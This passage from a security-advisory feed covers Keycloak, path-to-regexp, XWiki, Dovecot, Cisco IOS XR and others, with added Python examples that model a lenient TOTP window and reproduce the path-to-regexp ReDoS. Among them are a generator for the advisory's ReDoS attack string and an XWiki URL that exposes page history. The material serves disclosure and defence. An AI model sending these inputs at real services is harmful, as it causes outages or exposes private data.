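r"""Decode a path the way Git prints it when core.quotePath applies.

Git wraps such a path in double quotes and writes each byte that needs
quoting as \a \b \t \n \v \f \r \\ \" or as a three-digit octal escape of
the raw byte, e.g. "\303\251" for the UTF-8 encoding of "é".
"""
from __future__ import annotations

_SIMPLE_ESCAPES = {
    "a": 0x07, "b": 0x08, "t": 0x09, "n": 0x0A,
    "v": 0x0B, "f": 0x0C, "r": 0x0D, "\\": 0x5C, '"': 0x22,
}
_OCTAL_DIGITS = "01234567"


def unquote_git_path(quoted: str) -> bytes:
    """Return the raw path bytes for a path as printed by Git.

    Input without surrounding double quotes is returned as its UTF-8 bytes
    unchanged.  Malformed escapes raise ValueError instead of being guessed at.
    """
    if len(quoted) < 2 or quoted[0] != '"' or quoted[-1] != '"':
        return quoted.encode("utf-8")
    body = quoted[1:-1]
    out = bytearray()
    i = 0
    while i < len(body):
        ch = body[i]
        if ch != "\\":
            out += ch.encode("utf-8")
            i += 1
            continue
        if i + 1 >= len(body):
            raise ValueError("dangling backslash in quoted path")
        nxt = body[i + 1]
        if nxt in _SIMPLE_ESCAPES:
            out.append(_SIMPLE_ESCAPES[nxt])
            i += 2
            continue
        digits = body[i + 1:i + 4]
        if len(digits) == 3 and all(d in _OCTAL_DIGITS for d in digits):
            value = int(digits, 8)
            if value > 0xFF:
                raise ValueError(f"octal escape out of byte range: \\{digits}")
            out.append(value)
            i += 4
            continue
        raise ValueError(f"unknown escape at offset {i}: {body[i:i + 4]!r}")
    return bytes(out)


def naive_strip_quotes(quoted: str) -> bytes:
    """The approach the advisory describes: remove the quotes and nothing else.
    For "\303\251" this yields the nine ASCII bytes of the escape text, which
    is a different (and attacker-predictable) path from the intended "é"."""
    if len(quoted) >= 2 and quoted[0] == '"' and quoted[-1] == '"':
        quoted = quoted[1:-1]
    return quoted.encode("utf-8")
```

The decoder returns bytes rather than `str` on purpose: the octal escapes describe on-disk bytes, which need not be valid UTF-8, so the caller decides how (or whether) to decode them.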
07.09.2024 21:23:36rustsec[RUSTSEC-2024-0372] Memory leak when calling a canister method via `ic_cdk::call`When a canister method is called via `ic_cdk::call*`, a new Future `CallFuture` is created and can be awaited by the caller to get the execution result. Internally, the state of the Future is tracked and stored in a struct called `CallFutureState`. A bug in the polling implementation of the `CallFuture` allows multiple references to be held for this internal state, and not all references were dropped before the `Future` is resolved. Because of these unaccounted references, a copy of the internal state ends up persisted in the canister's heap, causing a memory leak. Impact: Canisters built in Rust with `ic_cdk` and `ic_cdk_timers` are affected. If these canisters call a canister method, use timers or heartbeat, they will likely leak a small amount of memory on every such operation. **In the worst case, this could lead to heap memory exhaustion triggered by an attacker.** Motoko-based canisters are not affected by the bug. Patches: The patch has been backported to all minor versions between `>= 0.8.0, <= 0.15.0`. The patched versions available are `0.8.2, 0.9.3, 0.10.1, 0.11.6, 0.12.2, 0.13.5, 0.14.1, 0.15.1`, and their previous versions have been yanked. Workarounds: There are no known workarounds at the moment. Developers are recommended to upgrade their canister as soon as possible to the latest available patched version of `ic_cdk` to avoid running out of Wasm heap memory. Upgrading the canisters (without updating `ic_cdk`) also frees the leaked memory, but it is only a temporary solution. References: [dfinity/cdk-rs/pull/509](https://github.com/dfinity/cdk-rs/pull/509), [ic_cdk docs](https://docs.rs/ic-cdk/latest/ic_cdk/), [Internet Computer Specification](https://internetcomputer.org/docs/current/references/ic-interface-spec)https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0372
08.09.2024 03:00:00debian[DSA-5767-1] thunderbird (critical)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5767-1
10.09.2024 01:34:12maven[MAVEN:GHSA-57RH-GR4V-J5F6] Keycloak Uses a Key Past its Expiration Date (moderate)A vulnerability was found in Keycloak. Expired OTP codes are still usable when using FreeOTP when the OTP token period is set to 30 seconds (default). Instead of expiring and being deemed unusable at around 30 seconds, the tokens are valid for an additional 30 seconds, totaling 1 minute. A one-time passcode that is valid longer than its expiration time increases the attack window for malicious actors to abuse the system and compromise accounts. Additionally, it increases the attack surface because at any given time two OTPs are valid.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-57RH-GR4V-J5F6
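The acceptance window the Keycloak advisory describes, modelled in code. This is an added example, not Keycloak or FreeOTP code: it implements RFC 4226 HOTP and RFC 6238 TOTP with HMAC-SHA1, plus a verifier whose `look_back` parameter says how many previous 30-second steps are still accepted. `look_back=0` is the strict behaviour (a code dies with its step); `look_back=1` reproduces the effect described above, a code usable for up to 60 seconds and two valid codes at every instant. The advisory does not say the Keycloak defect is literally a window setting; the window here is only a model of the observed behaviour. Eight digits are used so that the RFC 6238 Appendix B test vectors (secret `12345678901234567890`) apply; authenticator apps normally use six.

```python
"""TOTP (RFC 6238) verification and the effect of accepting previous time steps."""
from __future__ import annotations

import hashlib
import hmac
import struct

PERIOD = 30
DIGITS = 8  # RFC 6238 test vectors use 8 digits; FreeOTP/Keycloak default is 6


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian 8-byte counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, now: int, period: int = PERIOD, digits: int = DIGITS) -> str:
    """TOTP for the time step that contains the Unix time `now`."""
    return hotp(secret, now // period, digits)


def verify(secret: bytes, code: str, now: int, look_back: int,
           period: int = PERIOD, digits: int = DIGITS) -> bool:
    """Accept `code` if it matches the current step or any of the `look_back`
    previous steps.

    look_back=0 is strict: the code is rejected the moment its step ends.
    look_back=1 is the behaviour the advisory describes: the previous step's
    code is still accepted, so a code lives up to 2*period seconds and two
    codes are valid at any instant.
    """
    step = now // period
    return any(
        hmac.compare_digest(hotp(secret, step - k, digits), code)
        for k in range(look_back + 1)
    )


def valid_codes(secret: bytes, now: int, look_back: int) -> set[str]:
    """Every code a verifier with this window accepts at time `now`."""
    step = now // PERIOD
    return {hotp(secret, step - k) for k in range(look_back + 1)}
```

With the RFC 6238 SHA-1 vectors, T=1111111109 and T=1111111111 fall in consecutive 30-second steps (codes 07081804 and 14050471). At T=1111111111 the strict verifier accepts only 14050471; the lenient one also accepts 07081804, even though that code's own step ended two seconds earlier. A verifier that must tolerate clock skew should keep the window as small as its deployment allows and, independently, refuse to accept the same code twice.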
10.09.2024 01:33:52maven[MAVEN:GHSA-J76J-RQWJ-JMVV] Keycloak Session Fixation vulnerability (high)A session fixation issue was discovered in the SAML adapters provided by Keycloak. The session ID and JSESSIONID cookie are not changed at login time, even when the `turnOffChangeSessionIdOnLogin` option is configured. This flaw allows an attacker who hijacks the current session before authentication to trigger session fixation.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J76J-RQWJ-JMVV
10.09.2024 01:34:52maven[MAVEN:GHSA-G4GC-RH26-M3P5] Keycloak Open Redirect vulnerability (moderate)An open redirect vulnerability was found in Keycloak. A specially crafted URL can be constructed where the `referrer` and `referrer_uri` parameters are made to trick a user into visiting a malicious webpage. A trusted URL can trick users and automation into believing that the URL is safe, when, in fact, it redirects to a malicious server. This issue can result in a victim inadvertently trusting the destination of the redirect, potentially leading to a successful phishing attack or other types of attacks. Once a crafted URL is made, it can be sent to a Keycloak admin via email, for example. This will trigger the vulnerability when the user visits the page and clicks the link. A malicious actor can use this to target users they know are Keycloak admins for further attacks. It may also be possible to bypass other domain-related security checks, such as supplying this as an OAuth redirect URI. The malicious actor can further obfuscate the `redirect_uri` using URL encoding, to hide the text of the actual malicious website domain.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G4GC-RH26-M3P5
10.09.2024 17:52:46npm[NPM:GHSA-9WV6-86V2-598J] path-to-regexp outputs backtracking regular expressions (high)Impact: A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (`.`). For example, `/:a-:b`. Patches: For users of 0.1, upgrade to `0.1.10`. All other users should upgrade to `8.0.0`. Version 0.1.10 adds backtracking protection when a custom regular expression is not provided, so it is still possible to manually create a ReDoS vulnerability if you are providing custom regular expressions. Version 8.0.0 removes all features that can cause a ReDoS and stops exposing the regular expression directly. Workarounds: All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change `/:a-:b` to `/:a-:b([^-/]+)`. If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length: the cost grows quadratically with the input, so halving the attack string makes matching roughly 4x faster. Details: Using `/:a-:b` will produce the regular expression `/^\/([^\/]+?)-([^\/]+?)\/?$/`. This can be exploited by a path such as `/a${'-a'.repeat(8_000)}/a`. [OWASP](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) has a good example of why this occurs, but the TL;DR is that the `/a` at the end ensures this route can never match, yet due to naive backtracking the engine still attempts every way of splitting `:a-:b` across the repeated 8,000 `-a`. Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex results in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to an average latency of ~600ms vs 1ms. References: * [OWASP](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) * [Detailed blog post](https://blakeembrey.com/posts/2024-09-web-redos/)https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9WV6-86V2-598J
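The backtracking described in the path-to-regexp advisory, reproduced as an added example (not path-to-regexp code) in Python, whose `re` module is a backtracking engine that treats this pattern the same way V8's does. `UNSAFE` is the expression the advisory quotes for `/:a-:b`; `SAFE` is the equivalent of the advisory's workaround `/:a-:b([^-/]+)`, where the second parameter can no longer swallow the separator and so each candidate split fails in constant time. `attack_path` builds the advisory's input and `compare` returns the wall-clock time each expression needs to reject it, so the quadratic cost can be observed by raising `repeats`. The function names are this example's own.

```python
"""The path-to-regexp pattern for `/:a-:b` and its safe variant, in Python's re."""
from __future__ import annotations

import re
import time

# The expression path-to-regexp generates for `/:a-:b` (quoted in the advisory).
# For each place the first lazy group can stop at a "-", the second lazy group
# is extended one character at a time to the final "/" before failing: O(n^2).
UNSAFE = re.compile(r"^/([^/]+?)-([^/]+?)/?$")

# Equivalent of the advisory's workaround `/:a-:b([^-/]+)`: the second group
# cannot cross a "-", so every candidate split is rejected after one step: O(n).
SAFE = re.compile(r"^/([^/]+?)-([^-/]+)/?$")


def attack_path(repeats: int) -> str:
    """The advisory's input, `/a${'-a'.repeat(n)}/a`: the trailing `/a` means
    neither expression can ever match, which forces exhaustive backtracking."""
    return "/a" + "-a" * repeats + "/a"


def route_match(pattern: re.Pattern[str], path: str) -> tuple[str, str] | None:
    """Return the two captured parameters, or None when the route does not match."""
    m = pattern.match(path)
    return (m.group(1), m.group(2)) if m else None


def time_match(pattern: re.Pattern[str], path: str) -> float:
    """Seconds spent deciding whether `path` matches `pattern`."""
    start = time.perf_counter()
    pattern.match(path)
    return time.perf_counter() - start


def compare(repeats: int = 2000) -> dict[str, float]:
    """Time both expressions on the same attack string of the given size."""
    path = attack_path(repeats)
    return {"unsafe": time_match(UNSAFE, path), "safe": time_match(SAFE, path)}
```

Doubling `repeats` roughly quadruples the `unsafe` figure and leaves `safe` flat, which is the 4x-per-halving relationship the workaround section relies on. Both expressions still parse ordinary routes such as `/foo-bar` identically.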
09.09.2024 20:33:03slackware[SSA:2024-253-01] netatalk (high)New netatalk packages are available for Slackware 15.0 and -current to fix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/netatalk-3.2.8-i586-1_slack15.0.txz: Upgraded. Bump bundled WolfSSL library to stable version 5.7.2, GitHub #1433. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-1544 https://www.cve.org/CVERecord?id=CVE-2024-5288 https://www.cve.org/CVERecord?id=CVE-2024-5991 https://www.cve.org/CVERecord?id=CVE-2024-5814 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/netatalk-3.2.8-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/netatalk-3.2.8-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/netatalk-3.2.8-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/netatalk-3.2.8-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: ea023949b9b9718c76cbc9400914d0bf netatalk-3.2.8-i586-1_slack15.0.txz Slackware x86_64 15.0 package: c7af679ac32c1e17c737756d968ddc52 netatalk-3.2.8-x86_64-1_slack15.0.txz Slackware -current package: 6904bc31c57c731da7d3c8f3fbbb6a91 n/netatalk-3.2.8-i686-1.txz Slackware x86_64 -current package: a8f107e52dd2fee7f3814868df4dcda1 n/netatalk-3.2.8-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg netatalk-3.2.8-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-253-01
09.09.2024 23:20:05npm[NPM:GHSA-M9GF-397R-HWPG] AngularJS allows attackers to bypass common image source restrictions (low)Improper sanitization of the value of the `[srcset]` attribute in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing https://owasp.org/www-community/attacks/Content_Spoofing .This issue affects AngularJS versions 1.3.0-rc.4 and greater.Note:The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see here https://docs.angularjs.org/misc/version-support-status .https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M9GF-397R-HWPG
09.09.2024 23:20:05npm[NPM:GHSA-MQM9-C95H-X2P6] AngularJS allows attackers to bypass common image source restrictions (low)Improper sanitization of the value of the `[srcset]` attribute in `<source>` HTML elements in AngularJS allows attackers to bypass common image source restrictions, which can also lead to a form of Content Spoofing https://owasp.org/www-community/attacks/Content_Spoofing .This issue affects all versions of AngularJS.Note:The AngularJS project is End-of-Life and will not receive any updates to address this issue. For more information see here https://docs.angularjs.org/misc/version-support-status .https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MQM9-C95H-X2P6
09.09.2024 04:19:04fedora[FEDORA-2024-a27e8b69a0] Fedora 40: thunderbirdUpdate to 128.2.0. https://www.thunderbird.net/en-US/thunderbird/128.2.0esr/releasenotes/https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a27e8b69a0
09.09.2024 04:19:04fedora[FEDORA-2024-ee42af5a22] Fedora 40: chromium (high)update to 128.0.6613.119. High CVE-2024-8362: Use after free in WebAudio. High CVE-2024-7970: Out of bounds write in V8.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ee42af5a22
09.09.2024 04:06:11slackware[SSA:2024-252-01] python3 (critical)New python3 packages are available for Slackware 15.0 and -current to fix security issues.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/python3-3.9.20-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Bundled libexpat was updated to 2.6.3. Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. Email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. For more information, see: https://pythoninsider.blogspot.com/2024/09/python-3130rc2-3126-31110-31015-3920.html https://www.cve.org/CVERecord?id=CVE-2024-28757 https://www.cve.org/CVERecord?id=CVE-2024-45490 https://www.cve.org/CVERecord?id=CVE-2024-45491 https://www.cve.org/CVERecord?id=CVE-2024-45492 https://www.cve.org/CVERecord?id=CVE-2024-7592 https://www.cve.org/CVERecord?id=CVE-2024-4032 https://www.cve.org/CVERecord?id=CVE-2015-2104 https://www.cve.org/CVERecord?id=CVE-2024-6232 https://www.cve.org/CVERecord?id=CVE-2023-27043 https://www.cve.org/CVERecord?id=CVE-2024-8088 https://www.cve.org/CVERecord?id=CVE-2024-6923 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/python3-3.9.20-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/python3-3.9.20-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/python3-3.11.10-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/python3-3.11.10-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: 7a16800df88dde3f78f1479a6a8676f7 python3-3.9.20-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 8409cec0740a46683e2bd3e74f9e1be9 python3-3.9.20-x86_64-1_slack15.0.txz Slackware -current package: f697f24f3107d4f6c27e7c64c2345894 d/python3-3.11.10-i686-1.txz Slackware x86_64 -current package: a3c5f7144feeeb7aaf3727af3104d203 d/python3-3.11.10-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg python3-3.9.20-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-252-01
09.09.2024 03:45:05fedora[FEDORA-2024-1bd7266df0] Fedora 39: chromiumupdate to 128.0.6613.119. High CVE-2024-8362: Use after free in WebAudio. High CVE-2024-7970: Out of bounds write in V8.https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1bd7266df0
09.09.2024 03:00:00cisa[CISA-2024:0909] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0909
08.09.2024 04:47:13 rustsec [RUSTSEC-2024-0373] `Endpoint::retry()` calls can lead to panicking (high) In 0.11.0, we overhauled the server-side `Endpoint` implementation to enable more careful handling of incoming connection attempts. However, some of the code paths that cleaned up state after connection attempts were processed confused the initial destination connection ID with the destination connection ID of a substantial package. This resulted in the internal `Endpoint` state becoming inconsistent, which could then lead to a panic. https://github.com/quinn-rs/quinn/commit/e01609ccd8738bd438d86fa7185a0f85598cb58f Thanks to [@finbear](https://github.com/finnbear) for reporting and investigating, and to [@BiagoFesta](https://github.com/BiagoFesta) for coordinating. https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0373
10.09.2024 22:41:57 maven [MAVEN:GHSA-W97F-W3HQ-36G2] Keycloak Denial of Service vulnerability (moderate) A denial of service vulnerability was found in keycloak where the number of attributes per object is not limited; an attacker, by sending repeated HTTP requests, could cause resource exhaustion when the application sends back rows with long attribute values. https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W97F-W3HQ-36G2
10.09.2024 22:01:52 maven [MAVEN:GHSA-PVMM-55R5-G3MM] XWiki Platform document history including authors of any page exposed to unauthorized actors (moderate)
### Impact
The REST API exposes the history of any page in XWiki of which the attacker knows the name. The exposed information includes for each modification of the page the time of the modification, the version number, the author of the modification (both username and displayed name) and the version comment. This information is exposed regardless of the rights setup, and even when the wiki is configured to be fully private.
On a private wiki, this can be tested by accessing `/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history`; if this shows the history of the main page then the installation is vulnerable.
### Patches
This has been patched in XWiki 15.10.9 and XWiki 16.3.0RC1.
### Workarounds
There aren't any known workarounds apart from upgrading to a fixed version.
### References
* https://jira.xwiki.org/browse/XWIKI-22052
* https://github.com/xwiki/xwiki-platform/commit/9cbca9808300797c67779bb9a665d85cf9e3d4b8
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PVMM-55R5-G3MM
10.09.2024 18:15:14 alpinelinux [ALPINE:CVE-2024-23184] dovecot vulnerability [From CVE-2024-23184] Having a large number of address headers (From, To, Cc, Bcc, etc.) becomes excessively CPU intensive. With 100k header lines CPU usage is already 12 seconds, and in a production environment we observed 500k header lines taking 18 minutes to parse. Since this can be triggered by external actors sending emails to a victim, this is a security issue. An external attacker can send specially crafted messages that consume target system resources and cause outage. One can implement restrictions on address headers on MTA component preceding Dovecot. No publicly available exploits are known. https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-23184
10.09.2024 18:15:14 alpinelinux [ALPINE:CVE-2024-23185] dovecot vulnerability [From CVE-2024-23185] Very large headers can cause resource exhaustion when parsing a message. The message-parser normally reads reasonably sized chunks of the message. However, when it feeds them to message-header-parser, it starts building up a "full_value" buffer out of the smaller chunks. The full_value buffer has no size limit, so large headers can cause large memory usage. It doesn't matter whether it's a single long header line, or a single header split into multiple lines. This bug exists in all Dovecot versions. Incoming mails typically have some size limits set by the MTA, so even the largest possible header size may still fit into Dovecot's vsz_limit. So attackers probably can't DoS a victim user this way. A user could APPEND larger mails though, allowing them to DoS themselves (although maybe cause some memory issues for the backend in general). One can implement restrictions on headers on the MTA component preceding Dovecot. No publicly available exploits are known. https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-23185
11.09.2024 19:00:00 cisco [CISCO-SA-PAK-MEM-EXHST-3KE9FEFY] Cisco IOS XR Software UDP Packet Memory Exhaustion Vulnerability (high) A vulnerability in the multicast traceroute version 2 (Mtrace2) feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to exhaust the UDP packet memory of an affected device. This vulnerability exists because the Mtrace2 code does not properly handle packet memory. An attacker could exploit this vulnerability by sending crafted packets to an affected device. A successful exploit could allow the attacker to exhaust the incoming UDP packet memory. The affected device would not be able to process higher-level UDP-based protocol packets, possibly causing a denial of service (DoS) condition. Note: This vulnerability can be exploited using IPv4 or IPv6. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"]. https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-PAK-MEM-EXHST-3KE9FEFY
11.09.2024 19:00:00 cisco [CISCO-SA-NSO-AUTH-BYPASS-QNTEESP] Multiple Cisco Products Web-Based Management Interface Privilege Escalation Vulnerability (high) A vulnerability in the JSON-RPC API feature in ConfD that is used by the web-based management interfaces of Cisco Crosswork Network Services Orchestrator (NSO), Cisco Optical Site Manager, and Cisco RV340 Dual WAN Gigabit VPN Routers could allow an authenticated, remote attacker to modify the configuration of an affected application or device. This vulnerability is due to improper authorization checks on the API. An attacker with privileges sufficient to access the affected application or device could exploit this vulnerability by sending malicious requests to the JSON-RPC API. A successful exploit could allow the attacker to make unauthorized modifications to the configuration of the affected application or device, including creating new user accounts or elevating their own privileges on an affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NSO-AUTH-BYPASS-QNTEESP
11.09.2024 19:00:00 cisco [CISCO-SA-L2SERVICES-2MVHDNUC] Cisco IOS XR Software Network Convergence System Denial of Service Vulnerability (high) A vulnerability in the handling of specific Ethernet frames by Cisco IOS XR Software for various Cisco Network Convergence System (NCS) platforms could allow an unauthenticated, adjacent attacker to cause critical priority packets to be dropped, resulting in a denial of service (DoS) condition. This vulnerability is due to incorrect classification of certain types of Ethernet frames that are received on an interface. An attacker could exploit this vulnerability by sending specific types of Ethernet frames to or through the affected device. A successful exploit could allow the attacker to cause control plane protocol relationships to fail, resulting in a DoS condition. For more information, see the Details ["#details"] section of this advisory. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"]. https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-L2SERVICES-2MVHDNUC
11.09.2024 19:00:00 cisco [CISCO-SA-ISIS-XEHPBVNE] Cisco IOS XR Software Segment Routing for Intermediate System-to-Intermediate System Denial of Service Vulnerability (high) A vulnerability in the segment routing feature for the Intermediate System-to-Intermediate System (IS-IS) protocol of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient input validation of ingress IS-IS packets. An attacker could exploit this vulnerability by sending specific IS-IS packets to an affected device after forming an adjacency. A successful exploit could allow the attacker to cause the IS-IS process on all affected devices that are participating in the Flexible Algorithm to crash and restart, resulting in a DoS condition. Note: The IS-IS protocol is a routing protocol. To exploit this vulnerability, an attacker must be Layer 2-adjacent to the affected device and must have formed an adjacency. This vulnerability affects segment routing for IS-IS over IPv4 and IPv6 control planes as well as devices that are configured as level 1, level 2, or multi-level routing IS-IS type. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"]. https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISIS-XEHPBVNE
11.09.2024 19:00:00 cisco [CISCO-SA-IOSXR-XML-TCPDOS-ZEXVRU2S] Cisco IOS XR Software Dedicated XML Agent TCP Denial of Service Vulnerability (medium) A vulnerability in the Dedicated XML Agent feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) on XML TCP listen port 38751. This vulnerability is due to a lack of proper error validation of ingress XML packets. An attacker could exploit this vulnerability by sending a sustained, crafted stream of XML traffic to a targeted device. A successful exploit could allow the attacker to cause XML TCP port 38751 to become unreachable while the attack traffic persists. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"]. https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-XML-TCPDOS-ZEXVRU2S
11.09.2024 19:00:00 cisco [CISCO-SA-IOSXR-SHELLUTIL-HCB278WD] Cisco IOS XR Software CLI Arbitrary File Read Vulnerability (medium) A vulnerability in the CLI of Cisco IOS XR Software could allow an authenticated, local attacker to read any file in the file system of the underlying Linux operating system. The attacker must have valid credentials on the affected device. This vulnerability is due to incorrect validation of the arguments that are passed to a specific CLI command. An attacker could exploit this vulnerability by logging in to an affected device with low-privileged credentials and using the affected command. A successful exploit could allow the attacker to access files in read-only mode on the Linux file system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"]. https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-SHELLUTIL-HCB278WD
11.09.2024 19:00:00 cisco [CISCO-SA-IOSXR-PRIV-ESC-CRG5VHCQ] Cisco IOS XR Software CLI Privilege Escalation Vulnerability (high) A vulnerability in the CLI of Cisco IOS XR Software could allow an authenticated, local attacker to obtain read/write file system access on the underlying operating system of an affected device. This vulnerability is due to insufficient validation of user arguments that are passed to specific CLI commands. An attacker with a low-privileged account could exploit this vulnerability by using crafted commands at the prompt. A successful exploit could allow the attacker to elevate privileges to root. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is part of the September 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75416"]. https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-PRIV-ESC-CRG5VHCQ
